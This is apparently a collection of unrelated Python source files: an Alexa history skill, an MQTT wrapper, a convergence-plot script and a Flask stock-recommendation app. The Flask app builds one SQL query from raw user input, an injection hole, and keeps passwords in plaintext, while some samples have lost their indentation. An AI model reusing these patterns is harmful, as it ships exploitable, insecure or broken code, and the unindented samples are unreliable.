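    # grouped by their numeric index, unindexed ones end up under the key None.
    # The variable names below are hypothetical.
    os.environ["KLUCTL_ARG_0_NAME"] = "environment"
    os.environ["KLUCTL_ARG_0_VALUE"] = "prod"
    os.environ["KLUCTL_ARG_DEBUG"] = "true"
    return parse_env_config_sets("KLUCTL_ARG")
    # -> {'0': {'NAME': 'environment', 'VALUE': 'prod'}, None: {'DEBUG': 'true'}}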
|
StarcoderdataPython
|
6513832
|
<reponame>victorvasil93/flask-ask
import logging
import os
import re
from six.moves.urllib.request import urlopen
from flask import Flask
from flask_ask import Ask, request, session, question, statement
app = Flask(__name__)
ask = Ask(app, "/")
logging.getLogger('flask_ask').setLevel(logging.DEBUG)
# URL prefix to download history content from Wikipedia.
URL_PREFIX = 'https://en.wikipedia.org/w/api.php?action=query&prop=extracts' + \
'&format=json&explaintext=&exsectionformat=plain&redirects=&titles='
# Constant defining number of events to be read at one time.
PAGINATION_SIZE = 3
# Length of the delimiter between individual events.
DELIMITER_SIZE = 2
# Length of the "\nEvents\n" marker used to locate the events section in the response.
SIZE_OF_EVENTS = 10
# Constant defining session attribute key for the event index
SESSION_INDEX = 'index'
# Constant defining session attribute key for the event text key for date of events.
SESSION_TEXT = 'text'
@ask.launch
def launch():
speech_output = 'History buff. What day do you want events for?'
reprompt_text = "With History Buff, you can get historical events for any day of the year. " + \
"For example, you could say today, or August thirtieth. " + \
"Now, which day do you want?"
return question(speech_output).reprompt(reprompt_text)
@ask.intent('GetFirstEventIntent', convert={ 'day': 'date' })
def get_first_event(day):
month_name = day.strftime('%B')
day_number = day.day
events = _get_json_events_from_wikipedia(month_name, day_number)
if not events:
speech_output = "There is a problem connecting to Wikipedia at this time. Please try again later."
return statement('<speak>{}</speak>'.format(speech_output))
else:
card_title = "Events on {} {}".format(month_name, day_number)
speech_output = "<p>For {} {}</p>".format(month_name, day_number)
card_output = ""
for i in range(PAGINATION_SIZE):
speech_output += "<p>{}</p>".format(events[i])
card_output += "{}\n".format(events[i])
speech_output += " Wanna go deeper into history?"
card_output += " Wanna go deeper into history?"
reprompt_text = "With History Buff, you can get historical events for any day of the year. " + \
"For example, you could say today, or August thirtieth. " + \
"Now, which day do you want?"
session.attributes[SESSION_INDEX] = PAGINATION_SIZE
session.attributes[SESSION_TEXT] = events
speech_output = '<speak>{}</speak>'.format(speech_output)
return question(speech_output).reprompt(reprompt_text).simple_card(card_title, card_output)
@ask.intent('GetNextEventIntent')
def get_next_event():
events = session.attributes[SESSION_TEXT]
index = session.attributes[SESSION_INDEX]
card_title = "More events on this day in history"
speech_output = ""
card_output = ""
i = 0
while i < PAGINATION_SIZE and index < len(events):
speech_output += "<p>{}</p>".format(events[index])
card_output += "{}\n".format(events[index])
i += 1
index += 1
speech_output += " Wanna go deeper into history?"
reprompt_text = "Do you want to know more about what happened on this date?"
session.attributes[SESSION_INDEX] = index
speech_output = '<speak>{}</speak>'.format(speech_output)
return question(speech_output).reprompt(reprompt_text).simple_card(card_title, card_output)
@ask.intent('AMAZON.StopIntent')
def stop():
return statement("Goodbye")
@ask.intent('AMAZON.CancelIntent')
def cancel():
return statement("Goodbye")
@ask.session_ended
def session_ended():
return "{}", 200
def _get_json_events_from_wikipedia(month, date):
url = "{}{}_{}".format(URL_PREFIX, month, date)
data = urlopen(url).read().decode('utf-8')
return _parse_json(data)
def _parse_json(text):
events = []
try:
slice_start = text.index("\\nEvents\\n") + SIZE_OF_EVENTS
slice_end = text.index("\\n\\n\\nBirths")
        text = text[slice_start:slice_end]
except ValueError:
return events
start_index = end_index = 0
done = False
while not done:
try:
end_index = text.index('\\n', start_index + DELIMITER_SIZE)
event_text = text[start_index:end_index]
start_index = end_index + 2
except ValueError:
event_text = text[start_index:]
done = True
# replace dashes returned in text from Wikipedia's API
event_text = event_text.replace('\\u2013', '')
# add comma after year so Alexa pauses before continuing with the sentence
        event_text = re.sub(r'^\d+', r'\g<0>,', event_text)
events.append(event_text)
events.reverse()
return events
if __name__ == '__main__':
if 'ASK_VERIFY_REQUESTS' in os.environ:
verify = str(os.environ.get('ASK_VERIFY_REQUESTS', '')).lower()
if verify == 'false':
app.config['ASK_VERIFY_REQUESTS'] = False
app.run(debug=True)
|
StarcoderdataPython
|
1680162
|
<filename>app/mqtt_handler.py<gh_stars>1-10
import logging
import time
from queue import SimpleQueue
import paho.mqtt.client as mqtt
class MQTTHandler(object):
def __init__(self, mqtt_broker_host, mqtt_broker_port=1883):
self.logger = logging.getLogger("mqtt.client")
self.mqtt_broker_host = mqtt_broker_host
self.mqtt_broker_port = mqtt_broker_port
self.mqtt_client = mqtt.Client(
client_id="telegram2mqtt", protocol=mqtt.MQTTv311, transport="tcp"
)
self.mqtt_client.on_connect = self.on_connect
self.mqtt_client.on_disconnect = self.on_disconnect
self.mqtt_client.on_message = self.on_message
self.pending_messages = SimpleQueue()
self.connected = False
self.logger.info("MQTT-Handler is initialized.")
def __call__(self):
        self.mqtt_client.connect_async(self.mqtt_broker_host, port=self.mqtt_broker_port)
self.mqtt_client.loop_start()
self.logger.info("MQTT-Client started.")
def on_connect(self, client, userdata, flags, rc):
self.logger.debug(f"MQTT-Client connected. Flags: {flags}. Result code {rc}")
self.connected = True
def on_disconnect(self, client, userdata, rc):
self.logger.debug(f"MQTT-Client disconnected. Result code {rc}")
def on_message(self, client, userdata, msg):
self.logger.debug(
f"MQTT-Client received mesage. Topic: '{msg.topic}' Message: '{msg.payload}'"
)
self.pending_messages.put((msg.topic, msg.payload))
def subscribe(self, topic):
while not self.connected:
self.logger.debug("Subscribe - wait for connect...")
time.sleep(0.5)
self.mqtt_client.subscribe(topic)
self.logger.debug(f"Subscribed to {topic}")
def unsubscribe(self, topic):
while not self.connected:
self.logger.debug("Unsubscribe - wait for connect...")
time.sleep(0.5)
self.mqtt_client.unsubscribe(topic)
self.logger.debug(f"Unsubscribed from {topic}")
def publish(self, topic, message):
while not self.connected:
self.logger.debug("Publish - wait for connect...")
time.sleep(0.5)
self.mqtt_client.publish(topic, payload=message)
self.logger.debug(f"Published message '{message}' on topic '{topic}'.")
def disconnect(self):
self.mqtt_client.disconnect()
self.mqtt_client.loop_stop()
self.logger.info("MQTT-Client stopped.")
|
StarcoderdataPython
|
4862115
|
# TODO: Missing script docstring. How should this script be run? What is this for?
# -------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# -------------------------------------------------------------------------------------------
import argparse
from pathlib import Path
from typing import List, Dict, Optional
import pandas as pd
import yaml
from pydantic import BaseModel, Field
from abex.plotting import plot_convergence
import matplotlib
matplotlib.use("Agg")  # select a non-interactive backend before pyplot is imported
import matplotlib.pyplot as plt
BATCH_COLUMN = "Batch Number"
RUN_NAME_COLUMN = "Run Name"
class RunResultsConfig(BaseModel):
"""A class to collect configuration options for a run. Describes which files correspond to which batch number.
Properties
name: Name of the run. Used for plotting (labels etc).
objective_column: Which column in data files corresponds to the objective
folder: Which folder is the data located in
init_data_files: List of files corresponding to the initial files (batch 0)
batch_files: Dictionary mapping batch number to list of files corresponding to that batch.
(Paths are relative to the directory specified in the folder field)
batches_in_lexic_order: If True, ignore the batch_files field; instead, get all the files in the directory
specified by the folder field (other than the ones specified in init_data_files),
sort them lexicographically, and assume that they correspond to consecutive batches.
"""
name: str = ""
objective_column: Optional[str] = None
folder: Path = Field(default_factory=Path)
init_data_files: List[str] = Field(default_factory=list)
batch_files: Dict[int, List[str]] = Field(default_factory=dict)
batches_in_lexic_order: bool = False
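# --- Hedged example (added for illustration; not part of the original script) ---
# Shows the shape of a RunResultsConfig as described in the docstring above.
# All names and file paths below are assumptions, not values from the original repo.
_EXAMPLE_RUN_CONFIG = RunResultsConfig(
    name="example_run",
    objective_column="Objective",
    folder=Path("Results/example_run"),
    init_data_files=["init_batch.csv"],
    batch_files={1: ["batch_1.csv"], 2: ["batch_2.csv"]},
)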
def create_parser() -> argparse.ArgumentParser: # pragma: no cover
parser = argparse.ArgumentParser(
description="Plot convergence over several iterations of Bayesian Optimization, for possibly multiple runs."
"Assumes one file corresponds to one batch collected."
)
parser.add_argument(
"--config_files",
type=Path,
nargs="+",
required=True,
help="OptimizerConfig files describing which run and batch different files correspond to.",
)
parser.add_argument(
"--results_dir", type=Path, default=Path("Results"), help="The directory in which to save the resulting plot."
)
parser.add_argument(
"--output_path",
type=Path,
default=None,
help="If specified, the resulting path will be saved at this location "
"(otherwise a plot name will be generated).",
)
parser.add_argument("--title", type=str, default=None, help="The title for the plot.")
return parser
def load(file_paths: List[Path]) -> List[RunResultsConfig]: # pragma: no cover
configs = []
for yaml_file_path in file_paths:
with open(yaml_file_path) as f:
parsed_file = yaml.safe_load(f)
config = RunResultsConfig(**parsed_file)
configs.append(config)
return configs
def load_batches_with_run_and_batch_names(run_config: RunResultsConfig) -> pd.DataFrame: # pragma: no cover
# Get the initial_data
init_batch_paths = list(map(lambda filename: run_config.folder / filename, run_config.init_data_files))
init_batch_df = pd.concat(map(pd.read_csv, init_batch_paths)) # type: ignore # auto
init_batch_df[BATCH_COLUMN] = 0
# Get the DFs corresponding to batches
run_dfs = [init_batch_df]
if run_config.batches_in_lexic_order:
# If the remaining batch files are in lexicographic order, get all the filenames in folder and sort:
files_in_folder = [
child for child in run_config.folder.glob("**/*") if child.is_file() and child.suffix == ".csv"
]
# Get all csv files in folder that are not initial data files
batch_files = list(set(files_in_folder) - set(init_batch_paths))
# Sort in lexicographic order
batch_files = sorted(batch_files)
# Load into a DF
batch_dfs = list(map(pd.read_csv, batch_files))
for i, batch_df in enumerate(batch_dfs):
batch_df[BATCH_COLUMN] = i + 1 # type: ignore # auto
run_dfs.extend(batch_dfs)
else:
# Otherwise, get the files as specified by config
for batch_num, files in run_config.batch_files.items():
assert batch_num >= 0, "Batch number must be non-negative"
batch_paths = map(lambda filename: run_config.folder / filename, files)
batch_df = pd.concat(map(pd.read_csv, batch_paths)) # type: ignore # auto
batch_df[BATCH_COLUMN] = batch_num
run_dfs.append(batch_df)
run_df_combined = pd.concat(run_dfs)
run_df_combined[RUN_NAME_COLUMN] = run_config.name
return run_df_combined
def main(args): # pragma: no cover
configs: List[RunResultsConfig] = load(args.config_files)
# Assert all objective columns are the same:
assert len(set(map(lambda run_config: run_config.objective_column, configs))) == 1
all_runs_dfs = []
# For every config, get the dataframes for each batch + initial data
for run_config in configs:
run_df = load_batches_with_run_and_batch_names(run_config)
# Append the combined dataframe for this run to the list of all runs
all_runs_dfs.append(run_df)
combined_df = pd.concat(all_runs_dfs)
fig, _ = plot_convergence(
combined_df,
objective_col=configs[0].objective_column, # type: ignore # auto
batch_num_col=BATCH_COLUMN,
run_col=RUN_NAME_COLUMN,
)
assert fig is not None
# Possibly add title
if args.title:
fig.suptitle(args.title)
# Get output_path:
if args.output_path:
output_path = args.output_path
else:
filename = f"convergence_plot_{'__'.join([run_config.name for run_config in configs])}.png"
output_path = args.results_dir / filename
fig.savefig(output_path, bbox_inches="tight")
plt.close(fig)
if __name__ == "__main__": # pragma: no cover
args = create_parser().parse_args()
main(args)
|
StarcoderdataPython
|
8096675
|
<filename>main.py<gh_stars>0
from flask import Flask,redirect,render_template,request,url_for, session,jsonify
from datetime import datetime
from flask import send_file
import undetected_chromedriver as uc
from selenium.webdriver.common.by import By
import time
import os
import glob
from selenium.webdriver.support.ui import WebDriverWait
from threading import Thread
import csv
import sqlite3
import mysql.connector
import matplotlib.pyplot as plt
import threading
import base64
import re
import io
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from prediction.predictionstockmarket import predictDataSet
from prediction.predictionstockmarket import trainPredictDataSet
from prediction.tweets_sentiments import analysTweets
from sqlalchemy import create_engine
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
import numpy as np
import pandas as pd
import plotly.express as px
app=Flask(__name__)
app.secret_key = 'your secret key'
@app.route('/', methods=['GET', 'POST'])
def login():
# Output message if something goes wrong...
msg = ''
# Check if "username" and "password" POST requests exist (user submitted form)
if request.method == 'POST' and 'username' in request.form and 'password' in request.form:
# Create variables for easy access
username = request.form['username']
password = request.form['password']
# Check if account exists using MySQL
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute('SELECT * FROM usuario WHERE nick_name_usuario = %s AND password_usuario = %s', (username, password,))
# Fetch one record and return result
account = cur.fetchone()
# If account exists in accounts table in out database
if account:
# Create session data, we can access this data in other routes
session['loggedin'] = True
session['id'] = int (account['id_usuario'])
session['username'] = account['nick_name_usuario']
# Redirect to home page
return redirect(url_for('home'))
else:
            # Account doesn't exist or the username/password is incorrect
msg = 'Incorrect username/password!'
# Show the login form with message (if any)
return render_template('index.html', msg=msg)
@app.route('/requestCompany',methods=['GET','POST'])
def requestCompany():
return render_template('nasdaq_petition/index.html')
@app.route('/logout')
def logout():
# Remove session data, this will log the user out
session.pop('loggedin', None)
session.pop('id', None)
session.pop('username', None)
# Redirect to login page
return redirect(url_for('login'))
@app.route('/register', methods=['GET', 'POST'])
def register():
# Output message if something goes wrong...
msg = ''
# Check if "username", "password" and "email" POST requests exist (user submitted form)
if request.method == 'POST' and 'username' in request.form and 'password' in request.form and 'email' in request.form \
and 'nick_name' in request.form:
# Create variables for easy access
username = request.form['username']
password = request.form['password']
email = request.form['email']
nick_name = request.form['nick_name']
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute('SELECT * FROM usuario WHERE nick_name_usuario = %s', (nick_name,))
account = cur.fetchone()
#If account exists show error and validation checks
if account:
msg = 'Account already exists!'
elif not re.match(r'[^@]+@[^@]+\.[^@]+', email):
msg = 'Invalid email address!'
elif not re.match(r'[A-Za-z0-9]+', username):
msg = 'Username must contain only characters and numbers!'
elif not username or not password or not email:
msg = 'Please fill out the form!'
else:
            # Account doesn't exist and the form data is valid, now insert new account into accounts table
cur.execute('INSERT INTO usuario VALUES (NULL, %s,%s, %s, %s,NULL,%s,%s)', (username,nick_name,email, password,'<PASSWORD>',1))
db.commit()
msg = 'You have successfully registered!'
return render_template('register.html', msg=msg)
@app.route('/profile')
def profile():
# Check if user is loggedin
if 'loggedin' in session:
# We need all the account info for the user so we can display it on the profile page
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute('SELECT * FROM usuario WHERE id_usuario = %s', (session['id'],))
account = cur.fetchone()
# Show the profile page with account info
return render_template('profile.html', account=account)
# User is not loggedin redirect to login page
return redirect(url_for('login'))
@app.route('/data')
def data():
# Check if user is loggedin
if 'loggedin' in session:
# We need all the account info for the user so we can display it on the profile page
db = getMysqlConnection()
cur = db.cursor()
cur.execute('SELECT * FROM usuario')
accounts = cur.fetchall()
db.commit()
# Show the profile page with account info
return render_template('data.html', accounts=accounts)
# User is not loggedin redirect to login page
@app.route('/company2')
def company2(id=None):
if id != None:
sql = "SELECT * from empresa where id_empresa = %s";
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute(sql, (id,))
company = cur.fetchone()
return render_template("company2.html",company=company)
@app.route('/graph')
def graph():
img = io.BytesIO()
y = [1,2,3,4,5]
x = [0,2,1,3,4]
plt.plot(x,y)
plt.savefig(img, format='png')
img.seek(0)
plot_url = base64.b64encode(img.getvalue())
return render_template('graph2.html', plot_url=plot_url)
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
@app.route("/nn")
def train():
trainPredictDataSet("./downloads/HistoricalData_1638570426278.csv","INTC")
return ""
def byContent():
db_connection_str = 'mysql+pymysql://sistemasderecomendacion:<EMAIL>&<EMAIL>/sr'
db_connection = create_engine(db_connection_str)
df = pd.read_sql('SELECT nombre_empresa, sector, industry FROM empresa', con=db_connection)
#df.drop(['id_empresa','sigla_empresa','name_file','estado_empresa','exchange','dividen_pay','dividen_date',"market_cap"], axis=1, inplace=True)
df=df.replace({'\\$':''}, regex=True)
df=df.replace({'\\%':''}, regex=True)
df=df.replace({'N/A':''}, regex=True)
columnsString=["nombre_empresa","sector","industry"]
df[columnsString]=df[columnsString].astype("string")
"""columnsToArray=["today","h_week","share_volume","average_volume"]
for column in columnsToArray:
if(column=="today" or column=="h_week"):
separator="/"
else:
separator=","
df[column] = df[column].apply(lambda x: x.split(separator) if x != '' else [])
s = df.apply(lambda x: pd.Series(x[column]),axis=1).stack().reset_index(level=1, drop=True)
s.name = column+"_clean"
df = df.drop(column, axis=1).join(s)
columnsString=["nombre_empresa","sector","industry"]
df[columnsString]=df[columnsString].astype("string")
def processCol(col):
return col.astype(str).apply(lambda val: val.replace(',','') if val != '' else 0).astype(float)
num_columns = df.select_dtypes(exclude='string').columns
df[num_columns]=df[num_columns].apply(processCol)"""
vectorizer = TfidfVectorizer(min_df=1, stop_words='english')
bag_of_words= vectorizer.fit_transform(df["sector"]+" "+df["industry"])
cosine_sim = linear_kernel(bag_of_words, bag_of_words)
indices = pd.Series(df.index, index=df['nombre_empresa']).drop_duplicates()
def content_recommender(top, title, cosine_sim=cosine_sim, df=df, indices=indices):
idx = indices[title]
sim_scores = list(enumerate(cosine_sim[idx]))
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
sim_scores = sim_scores[1:top+1]
movie_indices = [i[0] for i in sim_scores]
return df['nombre_empresa'].iloc[movie_indices]
sql= "SELECT nombre_empresa FROM acciones a, empresa e where a.id_empresa=e.id_empresa and a.id_usuario =%s group by nombre_empresa"
db = getMysqlConnection()
cur = db.cursor()
cur.execute(sql,(session["id"],))
companies_of_user = [item[0] for item in cur.fetchall()]
aux=0
response=np.array([])
for company in companies_of_user:
if aux==2:
break
x=content_recommender(5,company).to_numpy()
response=np.concatenate((response, x))
        aux += 1
return response
def byFilter():
db = getMysqlConnection()
cur = db.cursor()
sql= "SELECT id_usuario FROM usuario"
cur.execute(sql)
users = cur.fetchall()
sql= "SELECT id_empresa, nombre_empresa FROM empresa"
cur.execute(sql)
companies = cur.fetchall()
d={}
l=[]
aux=0
for user in users:
d[user[0]]=[]
for company in companies:
sql= "SELECT count(*) FROM acciones where id_empresa = %s and id_usuario = %s"
cur.execute(sql,(company[0],user[0]))
count = cur.fetchone()
d[user[0]].append(count[0])
if aux==0:
l.append(company[1])
aux=1
df = pd.DataFrame(d, index =l)
df_corr=df.corr(method='pearson')
def vecinosCercanos(corrUser, k=5):
return corrUser[corrUser.index != corrUser.name].nlargest(n=k).index.tolist()
vecinos = df_corr.apply(lambda col: vecinosCercanos(col))
def calculateRecomendationUser(vecinosCercanos, usercorr, data):
def calculatePredictCompany(vecinosCercanos,usercorr,buyCompany):
haveBuy = ~np.isnan(buyCompany)
if(np.sum(haveBuy) != 0):
return np.dot(buyCompany.loc[haveBuy], usercorr.loc[haveBuy])/np.sum(usercorr[haveBuy])
else:
return np.nan
return df.apply(lambda row: calculatePredictCompany(vecinosCercanos, usercorr, row[vecinosCercanos]), axis=1)
predictCompany = df.apply(lambda buys: calculateRecomendationUser(vecinos[buys.name],df_corr[buys.name][vecinos[buys.name]],df))
predict=predictCompany[session["id"]].sort_values(ascending=False).head(5)
predict.to_csv("./al.csv")
ap=pd.read_csv("./al.csv")
ar=ap.iloc[:,0].to_numpy()
db.commit()
return ar
def hybrid():
content=byContent()
filter= byFilter()
db = getMysqlConnection()
cur = db.cursor()
sql= "SELECT nombre_empresa FROM acciones a, empresa e where a.id_empresa=e.id_empresa and a.id_usuario =%s group by nombre_empresa"
cur.execute(sql,(session["id"],))
companies_of_user = [item[0] for item in cur.fetchall()]
b = np.array(companies_of_user)
ar = np.intersect1d(content, filter)
c = ar[~np.in1d(ar,b)]
db.commit()
return c
@app.route("/getCompany/<int:id>")
def getCompany(id=None):
if id != None:
sql = "SELECT * from empresa where id_empresa = %s";
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute(sql, (id,))
company = cur.fetchone()
predictions= predict(company['name_file'],company['sigla_empresa'])
return render_template("company2.html",company=company, predictions=predictions)
@app.route("/saveBuy",methods=["POST"])
def saveBuy():
id_c=request.form['id_company']
now = datetime.now()
# dd/mm/YY H:M:S
fecha = now.strftime("%Y-%m-%d %H:%M:%S")
conn = getMysqlConnection()
cur = conn.cursor()
sql = 'INSERT INTO acciones (id_empresa,id_usuario,fecha_adquisicion,estado_accion) VALUES (%s,%s,%s,%s)'
val = (id_c,session["id"],fecha,"comprada")
cur.execute(sql, val)
conn.commit()
return ""
def getMysqlConnection():
return mysql.connector.connect(host='sistemasderecomendacion.mysql.database.azure.com',
database='sr',
user='sistemasderecomendacion',
password='<PASSWORD>',)
@app.route('/getMySQL')
def index(): # put application's code here
db = getMysqlConnection()
sqlstr = "select * from usuario"
cur = db.cursor()
cur.execute(sqlstr)
empleados = cur.fetchall()
return render_template('empresas/index.html',empleados=empleados)
@app.route('/destroy/<int:id>')
def destroy(id):
conn = getMysqlConnection()
cur = conn.cursor()
cur.execute("DELETE FROM usuario where id=%s",(id))
conn.commit()
return redirect('/')
@app.route('/edit/<int:id>')
def edit(id):
conn = getMysqlConnection()
cur = conn.cursor()
cur.execute("SELECT * FROM usuario where id=%s",(id))
usuarios = cur.fetchall()
conn.commit()
    return render_template('edit.html', usuarios=usuarios)
@app.route('/create')
def create(): # put application's code here
return render_template('empresas/create.html')
@app.route('/store',methods=['POST'])
def storage():
_nombre=request.form['txtNombre']
_apellido=request.form['txtApellido']
_correo=request.form['txtCorreo']
_numero=request.form['txtNumero']
sql = "INSERT INTO `persona`(`id`,`nombre`,`apellido`,`email`,`telefono`) VALUES (3,%s,%s,%s,%s);"
datos=(_nombre,_apellido,_correo,_numero)
conn = getMysqlConnection()
cursor = conn.cursor()
    cursor.execute(sql, datos)
conn.commit()
return render_template('empresas/index.html')
@app.route('/search',methods=['POST'])
def search():
_company_name=request.form['company_name']
_company_name = _company_name.replace(" ","%20")
link = "https://www.nasdaq.com/search?q="+_company_name+"&page=1&sort_by=relevence&langcode=en"
chrome_options = uc.ChromeOptions()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-popup-blocking")
chrome_options.add_argument("--profile-directory=Default")
chrome_options.add_argument("--ignore-certificate-errors")
chrome_options.add_argument("--disable-plugins-discovery")
chrome_options.add_argument("--incognito")
chrome_options.add_argument("user_agent=DN")
chrome_options.add_argument("--disable-gpu")
driver = uc.Chrome(options=chrome_options)
driver.delete_all_cookies()
driver.get(link)
response_table = driver.find_elements(By.CLASS_NAME,"search-results__text")
links =driver.find_element(By.CLASS_NAME,"search-results__results-items")
getLink = links.get_attribute("innerHTML")
getLinks = getLink.split("</a>")
respuesta=[]
aux=0
for item in response_table:
if aux == 5:
break;
s =item.text.splitlines()
if "Summary" not in s[0]:
break;
link = ""
s[0] = s[0].replace("- Summary","").strip()
s[1] = s[1].split(" ")[0]
for x in getLinks:
k= str(s[1].lower())
c= str(x)
if k in c:
link = find_between(c,'href="','"')
link = "https://www.nasdaq.com" + link
break;
add= [s[0],s[1],link]
if add not in respuesta:
respuesta.append(add)
aux= aux +1
driver.quit()
return render_template('nasdaq_response/index.html',response=respuesta)
@app.route("/selectData",methods=["POST","GET"])
def getData():
empresa = request.form['nombre']
sigla = request.form['sigla']
url = request.form['url']
def getDatas():
chrome_options = uc.ChromeOptions()
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-popup-blocking")
chrome_options.add_argument("--profile-directory=Default")
chrome_options.add_argument("--ignore-certificate-errors")
chrome_options.add_argument("--disable-plugins-discovery")
chrome_options.add_argument("--incognito")
chrome_options.add_argument("user_agent=DN")
chrome_options.add_argument("--disable-gpu")
dir = os.path.dirname(__file__)
filename = os.path.join(dir, 'downloads')
prefs = {}
prefs["profile.default_content_settings.popups"]=0
prefs["download.default_directory"]=filename
chrome_options.add_experimental_option("prefs", prefs)
driver = uc.Chrome(options=chrome_options)
driver.maximize_window()
driver.delete_all_cookies()
driver.get(url)
element = driver.find_element(By.CLASS_NAME,'summary-data__header')
element.location_once_scrolled_into_view
WebDriverWait(driver,10)
time.sleep(10);
titles = driver.find_elements(By.CLASS_NAME,"summary-data__cellheading")
titles2 = driver.find_elements(By.CLASS_NAME,"summary-data__cell")
data_company = []
for x in range(len(titles)):
data_company.append([titles[x].text,titles2[x].text])
driver.get(url+"/historical")
time.sleep(5)
driver.execute_script("scroll(0, 200);")
dates= driver.find_elements(By.CLASS_NAME,"table-tabs__tab")
for y in dates:
if y.get_attribute("data-value") == 'y10':
y.click();
break;
WebDriverWait(driver,5)
time.sleep(5)
try:
driver.find_element(By.XPATH,"/html/body/div[1]/div/main/div[2]/div[4]/div[3]/div/div[1]/div/div[1]/div[3]/button").click()
except NoSuchElementException:
try:
driver.find_element(By.XPATH,"/html/body/div[2]/div/main/div[2]/div[4]/div[3]/div/div[1]/div/div[1]/div[3]/button").click()
except NoSuchElementException:
pass
time.sleep(4);
driver.quit()
        list_of_files = glob.glob(os.path.join(filename, "*"))  # all files; use "*.csv" for a specific format
latest_file = max(list_of_files, key=os.path.getctime)#save id,empresa, sigla, latest_file
exchange = data_company[0][1]
sector = data_company [1][1]
industry = data_company [2][1]
year = data_company[3][1]
today = data_company[4][1]
share = data_company[5][1]
average = data_company[6][1]
previous = data_company[7][1]
week = data_company[8][1]
market = data_company[9][1]
ratio = data_company[10][1]
forward = data_company[11][1]
earnings = data_company[12][1]
annualized = data_company[13][1]
dividend = data_company[14][1]
dividendp = data_company[15][1]
current = data_company[16][1]
try:
beta = data_company[17][1]
except:
beta ="N/A"
name_file=latest_file.split("\\")[-1]
conn = getMysqlConnection()
cur = conn.cursor()
sql = 'INSERT INTO empresa (nombre_empresa,sigla_empresa,name_file,exchange,sector,industry,year_target,today,share_volume,average_volume,previous_close,h_week,market_cap,ratio,forward,earnings,annualized_dividend,dividen_date,dividen_pay,current_yield,estado_empresa,beta) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
val = (empresa,sigla,name_file,exchange, sector, industry ,year ,today ,share ,average ,previous ,week ,market,ratio ,forward,earnings,annualized,dividend,dividendp,current,'activo',beta)
cur.execute(sql, val)
conn.commit()
predict(name_file, sigla)
#getTweet(sigla)
#convertToCSV(sigla)
thread= Thread(target=getDatas)
thread.start()
return render_template("nasdaq_response/ok.html")
@app.route('/home',methods=['GET','POST'])
def home():
# Check if user is loggedin
if 'loggedin' in session:
# User is loggedin show them the home page
# We need all the account info for the user so we can display it on the profile page
db = getMysqlConnection()
cur = db.cursor()
cur.execute('SELECT count(*) FROM acciones where id_usuario = %s',(session["id"],))
tiene = cur.fetchone()
db.commit()
if tiene[0] > 0:
recomendados= hybrid()
arr_recomendados = []
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
for r in recomendados:
cur.execute('SELECT * FROM empresa where nombre_empresa = %s',(r,))
data_recomendados = cur.fetchall()
arr_recomendados.append(data_recomendados)
db.commit()
return render_template("home.html", username=session['username'], recomendados=arr_recomendados)
return render_template('home.html', username=session['username'])
# User is not loggedin redirect to login page
return redirect(url_for('login'))
@app.route("/ajaxlivesearch",methods=["POST","GET"])
def ajaxlivesearch():
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
if request.method == 'POST':
try:
search_word = request.form['query']
except:
search_word = ""
if search_word == '':
query = "SELECT * from empresa ORDER BY id_empresa"
cur.execute(query)
empresa = cur.fetchall()
numrows=""
else:
query = "SELECT * from empresa WHERE nombre_empresa LIKE '%{}%'".format(search_word)
cur.execute(query)
empresa = cur.fetchall()
numrows = 0
for e in empresa:
numrows=numrows + 1
return jsonify({'htmlresponse': render_template('response.html', empresa=empresa, numrows=numrows)})
@app.route('/buscador')
def buscador():
return render_template('a.html')
@app.route('/getPlotCSV/<init>') # this is a job for GET, not POST
def plot_csv(init):
df = pd.read_csv('downloads/'+ init , usecols=[0,1], header=0)
df=df.rename(columns={"Close/Last":"Close"})
df=df.replace({'\\$':''}, regex=True)
df.to_csv("./graph.csv",index=False,sep=',')
return send_file("./graph.csv",
mimetype='text/csv',
attachment_filename= "graph.csv",
as_attachment=True)
#@app.route('/getPlotCSV/<init>') # this is a job for GET, not POST
#def plot_csv(init):
# x = []
# y = []
# with open('downloads/'+ init,'r') as csvfile:
# plots = csv.reader(csvfile, delimiter = ',')
# for row in plots:
# x.append(row[0])
# y.append(row[1])
# plt.bar(x, y, color = 'g', width = 0.72, label = "Graph")
#plt.xlabel('Date')
#plt.ylabel('Close')
#plt.title('Graph')
#plt.legend()
#plt.show()
@app.route('/getPlotCSS') # this is a job for GET, not POST
def plot_css():
return send_file('templates/custom.css',
mimetype='text/css',
attachment_filename='custom.css',
as_attachment=True)
@app.route('/getB') # this is a job for GET, not POST
def plot_jpeg():
return send_file('templates/business.jpeg',
mimetype='img/jpeg',
attachment_filename='business.jpeg',
as_attachment=True)
#@app.route("/predictCompany")
def predict(archivo, sigla):
ruta_tweets=sigla+".csv"
ruta_data_accions="downloads/"+archivo
print(ruta_data_accions)
print(ruta_tweets)
sentimientos=analysTweets(ruta_tweets,sigla)
#predict=predictDataSet(ruta_data_accions)
predict=predictDataSet(ruta_data_accions,sigla)
result =[predict,sentimientos]
return result
def trainModel(archivo, sigla):
sigla=sigla+".csv"
ruta_data_accions="/downloads/"+archivo+sigla
train=trainPredictDataSet(ruta_data_accions,sigla)
return render_template("train_model_predict.html",training_data_len= train)
def getTweet(sigla):
import tweet_collector
tweet_collector.setArgs(sigla)
tweet_collector.run()
def convertToCSV(sigla):
csvWriter = csv.writer(open(sigla+'.csv', 'w',newline='',encoding='utf-8'))
conn = sqlite3.connect(sigla+'_2021-11-24-2021-11-25.db')
cursor = conn.cursor()
cursor.execute("SELECT * FROM Tweet")
rows = cursor.fetchall()
